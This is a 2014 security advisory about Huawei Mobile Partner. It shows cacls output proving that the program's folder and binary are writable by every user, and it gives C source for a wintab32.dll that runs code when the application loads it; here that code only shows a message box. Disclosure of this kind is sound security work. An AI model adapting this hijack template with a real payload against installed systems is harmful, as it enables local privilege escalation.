Huawei Mobile Partner DLL Hijacking
Posted on 21 October 2014
# Title: Huawei Mobile Partner Multiple Vulnerabilities # Version: 23.009.05.03.1014 # Tested on: Windows XP SP2 en # Vendor: http://www.huawei.com/ # Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide # E-Mail: osanda[at]unseen.is # Author: Osanda Malith Jayathissa # /! Author is not responsible for any damage you cause # Use this material for educational purposes only #1| Local Privilege Escalation -------------------------------- - Description ============== Any user in the system can modify the legitimate binary to any kind of malicious executable. The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and perform DLL hijacking easily. If an attacker break into a low privilege account he could use this application to escalate his privileges. - Proof of Concept =================== C:Program Files>cacls "Mobile Partner" C:Program FilesMobile Partner BUILTINUsers:(OI)(IO)F BUILTINUsers:(CI)F NT SERVICETrustedInstaller:(ID)F NT SERVICETrustedInstaller:(CI)(IO)(ID)F NT AUTHORITYSYSTEM:(ID)F NT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F BUILTINAdministrators:(ID)F BUILTINAdministrators:(OI)(CI)(IO)(ID)F CREATOR OWNER:(OI)(CI)(IO)(ID)F C:Program Files>cd "Mobile Partner" C:Program FilesMobile Partner>cacls "Mobile Partner.exe" C:Program FilesMobile PartnerMobile Partner.exe BUILTINUsers:F BUILTINUsers:(ID)F NT AUTHORITYSYSTEM:(ID)F BUILTINAdministrators:(ID)F #2| Dll Hijacking Vulnerability (wintab32.dll) ----------------------------------------------- #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Mobile Partner DLL Hijacked Osanda Malith", "POC", MB_OK | MB_ICONWARNING); } /*EOF*/
